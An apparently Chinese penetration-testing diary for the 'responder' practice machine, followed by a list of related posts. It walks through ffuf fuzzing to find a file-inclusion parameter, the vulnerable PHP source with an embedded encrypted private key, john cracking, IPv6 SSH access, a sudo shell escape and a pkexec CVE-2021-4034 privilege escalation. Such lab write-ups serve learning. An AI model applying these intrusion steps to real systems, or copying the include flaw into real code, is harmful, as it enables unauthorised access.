靶机渗透日记 responder
IP
端口
访问 80 端口只有一句话,目录扫描
访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数
ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0
得到参数 random ,burpsuite 抓包测试
使用 php 伪协议读取 filemanager.php 源码
<?php$filename = $_GET['random'];include($filename);header('Location:/');/*-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,411124D3C302D4F4XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7 vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4 ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3 GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4 YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf 3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/ wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN 4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw== -----END RSA PRIVATE KEY-----*/?>
得到了 ssh 私钥,但是端口扫描得知 22 端口处于 filter 状态
爆破 ssh 私钥
john --wordlists=/usr/share/wordlists/rockyou.txt hash.txt
使用 ipv6 地址链接 ssh
curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6'fe80000000000000020c29fffefeab39 02 40 20 80 ens33 00000000000000000000000000000001 01 80 10 80 lo fd154ba55a2b1008020c29fffefeab39 02 40 00 00 ens33
使用 nmap 扫描
nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39
连接
ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa -6
执行
sudo -l
发现可以以 rohit 用户运行 calc ,执行
!/bin/bash
获得 shell查看 SUID 文件,发现可以运行 pkexec ,使用 CVE-2021-4034 进行提权
靶机渗透日记 responder相关推荐
- 靶机渗透日记 controller
IP 端口 目录扫描 发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来 访问80端口 文档说明我们可以上传 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- 【渗透测试】靶机渗透Vulnhub-bulldog
目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...
- 靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...
- Bulldog靶机渗透
Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...
- 【VulnHub靶机渗透】一:BullDog2
在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...
- bulldog2 靶机渗透
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...
最新文章
- IT培训“来offer”获得数千万融资
- 通过修改程序解决Vista/Win7/Win8下应用程序兼容性问题
- 20nian5yue最热门的Python开源项目
- 关于mybatis返回前端日期格式化问题
- 截获android屏幕服务,如何捕获android设备屏幕内容?
- 『飞鸽』彻底学通string.Format以及IFormattable,IFormatProvider,ICustomFormatter
- /* program p5_04_AC 《聪明人的游戏提高篇》 1307:【例1.3】高精度乘法
- 联想陈旭东:我们有工匠精神
- UG8.5有限元仿真分析基础到高级视频教程
- 反编译工具Depends---dll和exe反编译工具
- K8S Pod配置进阶1 containers字段解释
- 用两个小例子来解释单例模式中的“双重锁定”
- 695. 岛屿的最大面积
- 数字化的下一个目标,就是产业链|数字思考者50人
- 4 Pics 1 Word,穷举答题
- 利用Basemap画世界地图
- 紫薯第9章动态规划,从入门到入土, dp 它tnl(背包代码模板部分)
- 传智播客技术社区_播客与网络技术的未来
- 微信图片消息 服务器故障,解决图片上传到微信服务器后无法显示问题
- 支持向量机之松弛变量与惩罚因子 (四)
热门文章
- (精)广东工业大学 2018实时大数据分析——A-Priori算法实验报告
- html万花筒图片轮播代码,jQuery实现可拖拽3D万花筒旋转特效
- 台式计算机如何自动开关机,联想电脑怎么设置定时开机|联想台式机自动开机设置方法...
- 谷歌李开复 我的传奇人生源于十句箴言
- WPF Binding绑定模式
- 视频教程-数据结构实战完全手册-C/C++
- MySQL 系列(三)你不知道的 视图、触发器、存储过程、函数、事务、索引、语句...
- 中国车联网行业市场现状分析及投资趋势预测报告2022-2028年
- 电脑出现“由于该设备有问题,Windows 已将其停止(代码 43)”的提示,该怎么解决?
- history的使用方法